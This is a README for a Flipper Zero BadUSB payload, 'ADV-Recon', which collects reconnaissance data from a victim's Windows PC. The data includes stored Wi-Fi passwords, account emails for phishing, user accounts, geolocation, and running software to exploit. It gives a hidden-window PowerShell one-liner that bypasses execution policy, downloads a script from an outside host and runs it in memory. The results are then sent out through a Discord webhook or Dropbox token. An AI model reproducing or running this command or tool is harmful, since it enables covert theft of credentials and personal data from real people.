jinks/Flipper-Zero-BadUSB
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
Flipper-Zero-BadUSB/Payloads/Flip-ADV-Recon/README.md
I-Am-Jakoby e1b7792ec1
Update README.md
2023-01-11 19:27:41 -06:00

4.8 KiB
Raw Permalink Blame History

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

ADV-Recon

A script used to do an advanced level of recon on the target's computer.

Version 2 no longer requires you to host your own version of the script.

Modifying the execution script is the only necessary interaction.

Description

This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:

  • Hosts PowerShell Version (to know what commands can be run)
  • Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
  • Whether they are in the Admin group or not
  • The email associated with their Microsoft account (for phishing possibilities)
  • Other User accounts on their system (for possible privilege escalation)
  • Details on their login settings (Ex: Min/Max password age and length)
  • How many days since they have changed their password (Max password age - Days since = Opportunity)
  • Their GeoLocation (know their approximate where abouts)
  • Nearby Wifi Networks (Possible lateral movement)
  • Network Info (Local and Public IP Address; MAC Address; RDP Enabled?)
  • WLAN Profiles (List of SSIDs and Passwords stored on their PC)
  • Network Interfaces (What are they connecting in and out with)
  • System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
  • Local Users (Accounts on system with Username, name associated with microsoft account and SID)
  • Information on their hard drives (Indicator of Recon Scope)
  • COM and Serial Devices (Is there a device connected you can manipulate?)
  • Active TCP Connections (Poor mans Port Scanning)
  • Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
  • Video Card info (how much vroom vroom?)
  • Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks)

Getting Started

Dependencies

  • Dropbox or Discord
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

$dc is the variable that stores your discord webhook

$db is the variable that stores your dropbox token

Fill in either or both of these two methods to exfil your collected data

powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

(back to top)

Version History

  • 0.1

    • Initial Release

  • 0.2

    • Added additional data queries
    • Optimized output of data

(back to top)

Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Golang
Instagram 		Jsonnet
Discord 		Jsonnet
TikTok

(back to top)

Acknowledgments

(back to top)